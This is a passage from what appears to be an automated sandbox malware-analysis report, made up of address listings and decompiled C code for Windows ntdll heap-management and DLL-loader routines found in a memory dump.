                                                    0x1d840256
                                                    0x1d840264
                                                    0x1d84026f
                                                    0x00000000
                                                    0x1d840274
                                                    0x1d83fe90
                                                    0x1d83fe93
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83fe9b
                                                    0x1d83fe9f
                                                    0x1d83fea2
                                                    0x1d83feaa
                                                    0x1d83feaf
                                                    0x1d83feb6
                                                    0x1d83feb6
                                                    0x1d83febb
                                                    0x1d83febb
                                                    0x1d83fec2
                                                    0x1d83fec7
                                                    0x1d83feca
                                                    0x1d83fecd
                                                    0x1d83fed1
                                                    0x1d83feda
                                                    0x1d83feda
                                                    0x1d83feda
                                                    0x1d83fedc
                                                    0x1d83fedf
                                                    0x1d83fee7
                                                    0x1d83fee9
                                                    0x1d83feee
                                                    0x1d83fef0
                                                    0x1d840122
                                                    0x1d840122
                                                    0x1d840125
                                                    0x1d840127
                                                    0x00000000
                                                    0x00000000
                                                    0x1d84012d
                                                    0x1d840133
                                                    0x1d840139
                                                    0x1d8401a7
                                                    0x1d8401aa
                                                    0x1d8401ad
                                                    0x1d8401b2
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8401bc
                                                    0x1d8401c3
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8401cd
                                                    0x1d8401d4
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8401da
                                                    0x1d8401e0
                                                    0x1d8401e3
                                                    0x1d840202
                                                    0x1d840207
                                                    0x1d8401e5
                                                    0x1d8401fa
                                                    0x1d8401ff
                                                    0x1d840218
                                                    0x1d840219
                                                    0x1d840224
                                                    0x1d84017e
                                                    0x1d84017e
                                                    0x1d840184
                                                    0x1d840188
                                                    0x1d84018e
                                                    0x1d840195
                                                    0x1d84019b
                                                    0x1d84019c
                                                    0x1d84019c
                                                    0x00000000
                                                    0x1d840188
                                                    0x1d84013b
                                                    0x1d84013e
                                                    0x1d84015d
                                                    0x1d840162
                                                    0x1d840140
                                                    0x1d840155
                                                    0x1d84015a
                                                    0x1d840168
                                                    0x1d840176
                                                    0x00000000
                                                    0x1d83fef6
                                                    0x1d83fef6
                                                    0x1d83fefc
                                                    0x1d83ff02
                                                    0x1d83ff70
                                                    0x1d83ff73
                                                    0x1d83ff76
                                                    0x1d83ff7b
                                                    0x1d840068
                                                    0x1d840070
                                                    0x1d840075
                                                    0x1d840078
                                                    0x1d84007a
                                                    0x1d840080
                                                    0x1d840080
                                                    0x1d840083
                                                    0x1d840087
                                                    0x1d840090
                                                    0x1d840090
                                                    0x1d840090
                                                    0x1d840092
                                                    0x1d840094
                                                    0x1d840097
                                                    0x1d84009a
                                                    0x1d84009f
                                                    0x1d8400a9
                                                    0x1d8400ac
                                                    0x1d8400ae
                                                    0x1d8400af
                                                    0x1d8400b3
                                                    0x1d8400b3
                                                    0x1d8400ac
                                                    0x1d8400b8
                                                    0x1d8400bc
                                                    0x1d8400ec
                                                    0x1d8400ef
                                                    0x1d8400f2
                                                    0x1d8400be
                                                    0x1d8400c0
                                                    0x1d8400c5
                                                    0x1d8400ca
                                                    0x1d8400d1
                                                    0x1d8400e3
                                                    0x1d8400d3
                                                    0x1d8400d4
                                                    0x1d8400d9
                                                    0x1d8400dc
                                                    0x1d8400df
                                                    0x1d8400df
                                                    0x1d8400e6
                                                    0x1d8400e6
                                                    0x1d8400f5
                                                    0x1d8400f9
                                                    0x1d8400fc
                                                    0x1d840108
                                                    0x1d84010e
                                                    0x1d84010e
                                                    0x1d84010e
                                                    0x1d8400fc
                                                    0x1d840114
                                                    0x1d840119
                                                    0x1d84011d
                                                    0x00000000
                                                    0x1d84011d
                                                    0x1d83ff81
                                                    0x1d83ff88
                                                    0x00000000
                                                    0x00000000
                                                    0x1d83ff8e
                                                    0x1d83ff91
                                                    0x1d83ff94
                                                    0x1d83ff97
                                                    0x1d83ff9c
                                                    0x1d83ffa6
                                                    0x1d83ffa9
                                                    0x1d83ffab
                                                    0x1d83ffb0
                                                    0x1d83ffb5
                                                    0x1d83ffb5
                                                    0x1d83ffa9
                                                    0x1d83ffb8
                                                    0x1d83ffbc
                                                    0x1d83ffce
                                                    0x1d83ffd1
                                                    0x1d83ffd4
                                                    0x1d83ffbe
                                                    0x1d83ffc0
                                                    0x1d83ffc5
                                                    0x1d83ffc8
                                                    0x1d83ffc8
                                                    0x1d83ffd7
                                                    0x1d83ffd9
                                                    0x1d83ffdd
                                                    0x1d83ffe0
                                                    0x1d83ffea
                                                    0x1d83fff0
                                                    0x1d83fff0
                                                    0x1d83fff0
                                                    0x1d83fff2
                                                    0x1d83fff5
                                                    0x1d840065
                                                    0x1d840065
                                                    0x1d83fff7
                                                    0x1d83fff7
                                                    0x1d83fffe
                                                    0x00000000
                                                    0x00000000
                                                    0x1d840004
                                                    0x1d84000b
                                                    0x00000000
                                                    0x00000000
                                                    0x1d84000d
                                                    0x1d840013
                                                    0x1d840016
                                                    0x1d840035
                                                    0x1d84003a
                                                    0x1d840018
                                                    0x1d84002d
                                                    0x1d840032
                                                    0x1d840040
                                                    0x1d84004b
                                                    0x1d84004c
                                                    0x1d84004f
                                                    0x1d840058
                                                    0x1d84005d
                                                    0x1d83ff47
                                                    0x1d83ff47
                                                    0x1d83ff4d
                                                    0x1d83ff51
                                                    0x1d83ff57
                                                    0x1d83ff5e
                                                    0x1d83ff64
                                                    0x1d83ff65
                                                    0x1d83ff65
                                                    0x1d83ff51
                                                    0x00000000
                                                    0x1d83fff5
                                                    0x1d83ff04
                                                    0x1d83ff07
                                                    0x1d83ff26
                                                    0x1d83ff2b
                                                    0x1d83ff09
                                                    0x1d83ff1e
                                                    0x1d83ff23
                                                    0x1d83ff31
                                                    0x1d83ff3f
                                                    0x1d83ff44
                                                    0x00000000
                                                    0x1d83ff44
                                                    0x1d83fe18
                                                    0x1d83fe20
                                                    0x1d83fe28
                                                    0x1d83fe2e
                                                    0x1d8402d1
                                                    0x1d8402d4
                                                    0x1d8402e0
                                                    0x1d8402e0

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 3446177414-1700792311
                                                    • Opcode ID: e362dc08285f13e073b9ec4f8bd1baa30b3e27de49e5fcbd0129a086c61280fc
                                                    • Instruction ID: 72141365fedde4183104c60b22a248e033637fc351856183fc950262196f97a0
                                                    • Opcode Fuzzy Hash: e362dc08285f13e073b9ec4f8bd1baa30b3e27de49e5fcbd0129a086c61280fc
                                                    • Instruction Fuzzy Hash: 27D1F2359046A9EFCB02DF68C440BAEBBF2FF49721F15C049E4459B262D735E942CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7C4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 41%
                                                    			E1D7C4C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x1d8865e4; // 0x75f1f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x1d885b24; // 0x18e2d98
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x1d8865e4; // 0x75f1f0e0
					 *0x1d8891e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E1D7926A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x1d8837c0 & 0x00000003) != 0) {
								E1D80E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x1d8837c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1d8837c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E1D80E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}















                                                    0x1d7c4c42
                                                    0x1d7c4c47
                                                    0x1d7c4c4a
                                                    0x1d7c4c4c
                                                    0x1d7c4c52
                                                    0x1d7c4cb8
                                                    0x1d7c4cbe
                                                    0x1d7c4cbe
                                                    0x1d7c4c5a
                                                    0x1d7c4c5d
                                                    0x1d7c4c69
                                                    0x1d7c4c6f
                                                    0x1d7c4c74
                                                    0x1d7c4cd6
                                                    0x1d7c4cda
                                                    0x1d8033b9
                                                    0x1d8033be
                                                    0x1d8033f7
                                                    0x1d8033f7
                                                    0x1d8033be
                                                    0x1d7c4cda
                                                    0x1d7c4c76
                                                    0x1d7c4c84
                                                    0x1d7c4c8c
                                                    0x1d7c4c90
                                                    0x1d7c4ca9
                                                    0x1d7c4ca9
                                                    0x1d7c4cae
                                                    0x1d7c4ce4
                                                    0x1d7c4cee
                                                    0x1d7c4cf3
                                                    0x1d7c4cf3
                                                    0x1d7c4ce6
                                                    0x1d7c4ce6
                                                    0x1d7c4cb2
                                                    0x1d803463
                                                    0x1d80347b
                                                    0x1d803480
                                                    0x1d80348a
                                                    0x1d803490
                                                    0x1d803490
                                                    0x1d80348a
                                                    0x00000000
                                                    0x1d7c4cb2
                                                    0x1d7c4c98
                                                    0x1d7c4cc5
                                                    0x1d803429
                                                    0x00000000
                                                    0x00000000
                                                    0x1d80342f
                                                    0x1d7c4cc5
                                                    0x1d7c4ca1
                                                    0x1d803434
                                                    0x1d803435
                                                    0x1d80344f
                                                    0x1d803454
                                                    0x1d803454
                                                    0x1d7c4ca7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    • LdrpFindDllActivationContext, xrefs: 1D803440, 1D80346C
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 1D80344A, 1D803476
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 1D803466
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D803439
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 3446177414-3779518884
                                                    • Opcode ID: 84a03e8b56135d7f680ab60b6c4362dada251ce0888c87cbd51fe43726c8935c
                                                    • Instruction ID: bcb1b0e974e75d0f646b4d8c79bd9840f32293e1832593114c59e08892988ea5
                                                    • Opcode Fuzzy Hash: 84a03e8b56135d7f680ab60b6c4362dada251ce0888c87cbd51fe43726c8935c
                                                    • Instruction Fuzzy Hash: AC318472E00293AFDB32AB088C89B7AB3A4BB5577DF468167D90557171E760BD80C393
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7A0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E1D7A0680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E1D7A0ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x1d886960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E1D78B910();
						} else {
							E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E1D78B910();
						__eflags =  *0x1d885da8;
						if(__eflags == 0) {
							E1D84FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x1d886d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x1d8891e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E1D7D2BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E1D855FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x1d88373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E1D7D2B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E1D84EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E1D84D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E1D855FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E1D7A096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E1D855FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E1D7A3C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E1D84F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E1D7A3C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E1D84F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E1D7A036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E1D855FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E1D855FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x1d88432c; // 0x0
						_v24 = 0x1d88432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}
























































                                                    0x1d7a0689
                                                    0x1d7a068d
                                                    0x1d7a0690
                                                    0x1d7a0699
                                                    0x1d7a06a3
                                                    0x1d7a0929
                                                    0x00000000
                                                    0x1d7a0929
                                                    0x1d7a06b0
                                                    0x1d7f4e97
                                                    0x1d7f4e99
                                                    0x1d7f4e9f
                                                    0x1d7f4ea5
                                                    0x1d7f4ea9
                                                    0x1d7f4eca
                                                    0x1d7f4ecf
                                                    0x1d7f4eab
                                                    0x1d7f4ec0
                                                    0x1d7f4ec5
                                                    0x1d7f4ed7
                                                    0x1d7f4edc
                                                    0x1d7f4ee4
                                                    0x1d7f4eeb
                                                    0x1d7f4ef6
                                                    0x1d7f4ef6
                                                    0x1d7f4eeb
                                                    0x1d7f4e99
                                                    0x1d7a06b6
                                                    0x1d7a06b9
                                                    0x1d7a06b9
                                                    0x1d7a06be
                                                    0x1d7a0921
                                                    0x1d7a06c4
                                                    0x1d7a06c4
                                                    0x1d7a06c4
                                                    0x1d7a06ca
                                                    0x1d7a06d3
                                                    0x1d7a06d9
                                                    0x1d7a06dc
                                                    0x1d7f4f0a
                                                    0x1d7f4f10
                                                    0x1d7f4f13
                                                    0x00000000
                                                    0x1d7a06e2
                                                    0x1d7a06e2
                                                    0x1d7a06f2
                                                    0x1d7a0930
                                                    0x1d7a0936
                                                    0x1d7a0938
                                                    0x1d7a093e
                                                    0x1d7a093e
                                                    0x1d7a0938
                                                    0x1d7a06ff
                                                    0x1d7f4f1b
                                                    0x1d7f4f1d
                                                    0x1d7f4f22
                                                    0x1d7f4f29
                                                    0x1d7f4f2a
                                                    0x1d7f4f2c
                                                    0x1d7f4f2d
                                                    0x1d7f4f2f
                                                    0x1d7f4f34
                                                    0x1d7f4f36
                                                    0x1d7f4f39
                                                    0x1d7f4f44
                                                    0x1d7f4f4d
                                                    0x1d7f4f4f
                                                    0x1d7f4f54
                                                    0x1d7f4f5b
                                                    0x1d7f4f5b
                                                    0x00000000
                                                    0x1d7f4f5b
                                                    0x1d7f4f3b
                                                    0x1d7f4f3d
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f4f3f
                                                    0x1d7f4f42
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7a0705
                                                    0x1d7a0705
                                                    0x1d7a070c
                                                    0x1d7a070e
                                                    0x1d7a0724
                                                    0x1d7a0727
                                                    0x1d7a072d
                                                    0x1d7a0730
                                                    0x1d7a0751
                                                    0x1d7a0751
                                                    0x1d7a0757
                                                    0x1d7a075c
                                                    0x1d7a075d
                                                    0x1d7a075f
                                                    0x1d7a0760
                                                    0x1d7a0762
                                                    0x1d7a0767
                                                    0x1d7a076a
                                                    0x1d7a076a
                                                    0x1d7a0770
                                                    0x1d7a0772
                                                    0x1d7f4f9f
                                                    0x00000000
                                                    0x1d7f4f9f
                                                    0x1d7a077e
                                                    0x1d7a0783
                                                    0x1d7f4faa
                                                    0x1d7f4fad
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f4fbc
                                                    0x1d7a078e
                                                    0x1d7a0791
                                                    0x1d7f4fcc
                                                    0x1d7f4fd3
                                                    0x1d7f4fe2
                                                    0x1d7f4fe2
                                                    0x1d7f4fd3
                                                    0x1d7a079b
                                                    0x1d7a07a0
                                                    0x1d7a07a4
                                                    0x1d7a07b0
                                                    0x1d7a07b7
                                                    0x1d7f4fec
                                                    0x1d7f4ff1
                                                    0x1d7f4ff1
                                                    0x1d7a07b7
                                                    0x1d7a07bd
                                                    0x1d7a07c1
                                                    0x1d7a07c5
                                                    0x1d7a07c8
                                                    0x1d7a07cb
                                                    0x1d7a07d0
                                                    0x1d7a07d3
                                                    0x1d7a07d3
                                                    0x1d7a07d6
                                                    0x1d7f5008
                                                    0x1d7a07e4
                                                    0x1d7a07e4
                                                    0x1d7a07e6
                                                    0x1d7a07e6
                                                    0x1d7a07e9
                                                    0x1d7a07ee
                                                    0x1d7a081b
                                                    0x1d7a081b
                                                    0x1d7a081e
                                                    0x1d7a0827
                                                    0x1d7a082d
                                                    0x1d7a0833
                                                    0x1d7a0839
                                                    0x1d7a083f
                                                    0x1d7a0848
                                                    0x1d7a08fd
                                                    0x1d7a0903
                                                    0x1d7a0903
                                                    0x1d7a084e
                                                    0x1d7a0851
                                                    0x1d7a0855
                                                    0x1d7a0945
                                                    0x1d7a094d
                                                    0x1d7a0950
                                                    0x1d7a0953
                                                    0x1d7a0964
                                                    0x00000000
                                                    0x1d7a0964
                                                    0x1d7a0955
                                                    0x00000000
                                                    0x1d7a085b
                                                    0x1d7a085b
                                                    0x1d7a086e
                                                    0x1d7a0876
                                                    0x1d7a0879
                                                    0x1d7a0879
                                                    0x1d7a087c
                                                    0x1d7a0880
                                                    0x1d7a0885
                                                    0x1d7a08dd
                                                    0x1d7a08de
                                                    0x1d7a08e1
                                                    0x1d7a08e6
                                                    0x1d7a08f3
                                                    0x1d7a08f8
                                                    0x1d7a08f8
                                                    0x1d7a0887
                                                    0x1d7a0887
                                                    0x1d7a0887
                                                    0x1d7a0889
                                                    0x1d7a0892
                                                    0x1d7a0897
